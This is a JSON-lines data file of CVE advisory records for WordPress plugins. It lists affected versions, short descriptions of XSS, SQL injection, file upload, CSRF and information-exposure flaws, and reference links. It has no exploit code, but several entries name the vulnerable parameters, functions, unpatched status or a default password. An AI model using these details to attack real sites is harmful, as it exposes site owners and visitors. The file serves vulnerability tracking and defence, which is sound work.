{"CVE_ID":"CVE-2023-0695","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a specific link. Note that getting the JavaScript to execute still requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c866d8d-399c-4bda-a3c9-17c7e5d2ffb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c866d8d-399c-4bda-a3c9-17c7e5d2ffb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3041","slug":"auyautochat-for-wp","versionImpact":"1.1.7","description":"The Autochat Automatic Conversation WordPress plugin through 1.1.7 does not sanitise and escape user input before outputting it back on the page, leading to a cross-site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93cad990-b6be-4ee1-9cdf-0211a7fe6c96\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93cad990-b6be-4ee1-9cdf-0211a7fe6c96\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-41131","slug":"spotify-play-button-for-wordpress","versionImpact":"2.10","description":"Cross-Site Request Forgery (CSRF) vulnerability in Jonk @ Follow me Darling Sp*tify Play Button for WordPress plugin <=\u00a02.10 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1448","slug":"sassy-social-share","versionImpact":"3.3.56","description":"The Social Sharing Plugin \u2013 Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.3.56 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c2f4b74-2568-4e5a-b55f-0130096bc19f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.56\\\/includes\\\/class-sassy-social-share-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sassy-social-share\\\/tags\\\/3.3.56\\\/includes\\\/class-sassy-social-share-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3038227%40sassy-social-share%2Ftrunk&old=2996153%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0700","slug":"simple-tweet","versionImpact":"1.4.0.2","description":"The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wTeBwAA\\\/PoC-SimpleTweet\\\/blob\\\/main\\\/POST-request\",\"name\":\"https:\\\/\\\/github.com\\\/wTeBwAA\\\/PoC-SimpleTweet\\\/blob\\\/main\\\/POST-request\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-tweet\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-tweet\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2273","slug":"kadence-blocks","versionImpact":"3.2.34","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 3.2.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7fe482e-a4e8-411c-97a4-a32ccf5b3682?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7fe482e-a4e8-411c-97a4-a32ccf5b3682?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075158%40kadence-blocks%2Ftrunk&old=3068562%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075158%40kadence-blocks%2Ftrunk&old=3068562%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4616","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d203bf3b-aee9-4755-b429-d6bbdd940890\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d203bf3b-aee9-4755-b429-d6bbdd940890\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7648","slug":"opal-membership","versionImpact":"1.2.4","description":"The Opal Membership plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.4 via the private notes functionality on payments which utilizes WordPress comments. This makes it possible for authenticated attackers, with subscriber-level access and above, to view private notes via recent comments that should be restricted to just administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3098565-d037-4a31-af3c-00e8b93b922e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3098565-d037-4a31-af3c-00e8b93b922e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-ajax.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-ajax.php#L128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/mixes-functions.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/mixes-functions.php#L154\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8543","slug":"slider-comparison-image-before-and-after","versionImpact":"0.8.3","description":"The Slider comparison image before and after plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [sciba] shortcode in all versions up to, and including, 0.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-comparison-image-before-and-after\\\/trunk\\\/sciba.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-comparison-image-before-and-after\\\/trunk\\\/sciba.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12595","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin WordPress plugin through 1.6 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a506438-3106-477f-816d-b9b116ec8555\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a506438-3106-477f-816d-b9b116ec8555\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22762","slug":"octrace-support","versionImpact":"1.2.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Octrace Studio WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support allows Stored XSS. This issue affects WordPress HelpDesk & Support Ticket System Plugin \u2013 Octrace Support: from n\/a through 1.2.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-pro-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/octrace-support\\\/vulnerability\\\/wordpress-octrace-support-pro-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12638","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6f5b0fe-00a0-4e30-aec6-87882c035beb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0512","slug":"structured-content","versionImpact":"6.4.5","description":"The Structured Content (JSON-LD) #wpsc plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sc_fs_local_business shortcode in all versions up to, and including, 6.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/trunk\\\/templates\\\/shortcodes\\\/local-business.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/structured-content\\\/trunk\\\/templates\\\/shortcodes\\\/local-business.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248930\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3248930\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/structured-content\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac5fe69-7885-4fb7-8107-079216d6955e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ac5fe69-7885-4fb7-8107-079216d6955e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2478","slug":"code-clone","versionImpact":"0.9","description":"The Code Clone plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018snippetId\u2019 parameter in all versions up to, and including, 0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-clone\\\/trunk\\\/admin\\\/snippet-edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/code-clone\\\/trunk\\\/admin\\\/snippet-edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-clone\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/code-clone\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b6f21ce-8601-425f-bd44-6a1af31c67de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b6f21ce-8601-425f-bd44-6a1af31c67de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5058","slug":"store-manager-connector","versionImpact":"1.2.5","description":"The eMagicOne Store Manager for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_image() function in all versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable by unauthenticated attackers in default configurations where the default password is left as 1:1, or where the attacker gains access to the credentials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5058\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-5058\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2115\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmconnectorcommon.php#L2115\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L272\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-manager-connector\\\/trunk\\\/classes\\\/class-emosmcwoocommerceoverrider.php#L272\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5058\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-5058\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a00ece0-6644-4535-86aa-d0802d94a1a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a00ece0-6644-4535-86aa-d0802d94a1a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5940","slug":"osomblocks","versionImpact":"1.2.1","description":"The Osom Blocks \u2013 Custom Post Type listing block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class_name\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osomblocks\\\/trunk\\\/blocks\\\/cpt-list\\\/index.php#L171\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/osomblocks\\\/trunk\\\/blocks\\\/cpt-list\\\/index.php#L171\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osomblocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/osomblocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e022df-0dc7-4f60-811d-48a92b723d55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54e022df-0dc7-4f60-811d-48a92b723d55?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0713","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_add_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2764b360-228d-48c1-8a29-d3764e532799\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2764b360-228d-48c1-8a29-d3764e532799\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0694","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about any standard form field of any form submission.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8b194c-371f-4adc-98fa-8f4e47a38ee7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a8b194c-371f-4adc-98fa-8f4e47a38ee7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5577","slug":"wp-bitly","versionImpact":"2.7.1","description":"The Bitly's plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpbitly' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31522e54-f260-46d0-8d57-2d46af7d3450?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31522e54-f260-46d0-8d57-2d46af7d3450?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-shortlink.php?rev=2767772#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-bitly\\\/trunk\\\/includes\\\/class-wp-bitly-shortlink.php?rev=2767772#L238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0687","slug":"restrict-user-access","versionImpact":"2.5","description":"The Restrict User Access \u2013 Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages via API.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2109","slug":"booster-extension","versionImpact":"1.2.0","description":"The Booster Extension plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.0 via the 'booster_extension_authorbox_shortcode_display' function. This makes it possible for unauthenticated attackers to extract sensitive data including user emails.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89458095-2efe-4162-961a-7dc80852d312?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89458095-2efe-4162-961a-7dc80852d312?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booster-extension\\\/tags\\\/1.2.0\\\/inc\\\/frontend\\\/author-box-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booster-extension\\\/tags\\\/1.2.0\\\/inc\\\/frontend\\\/author-box-shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4477","slug":"wp-logs-book","versionImpact":"1.0.1","description":"The WP Logs Book WordPress plugin through 1.0.1 does not sanitise and escape some of its log data before outputting them back in an admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab551552-944c-4e2a-9355-7011cbe553b0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab551552-944c-4e2a-9355-7011cbe553b0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8241","slug":"nova-blocks","versionImpact":"2.1.7","description":"The Nova Blocks by Pixelgrade plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute of the 'wp:separator' Gutenberg block in all versions up to, and including, 2.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011befd-c0c6-4800-a370-e592c3ec483f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3011befd-c0c6-4800-a370-e592c3ec483f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nova-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nova-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148752\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148752\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/pixelgrade\\\/nova-blocks\\\/commit\\\/655b5b804306c3ca3a59707cc2f12098e193b4ca\",\"name\":\"https:\\\/\\\/github.com\\\/pixelgrade\\\/nova-blocks\\\/commit\\\/655b5b804306c3ca3a59707cc2f12098e193b4ca\",\"refsource\":\"\",\"tags\":[]}]"}
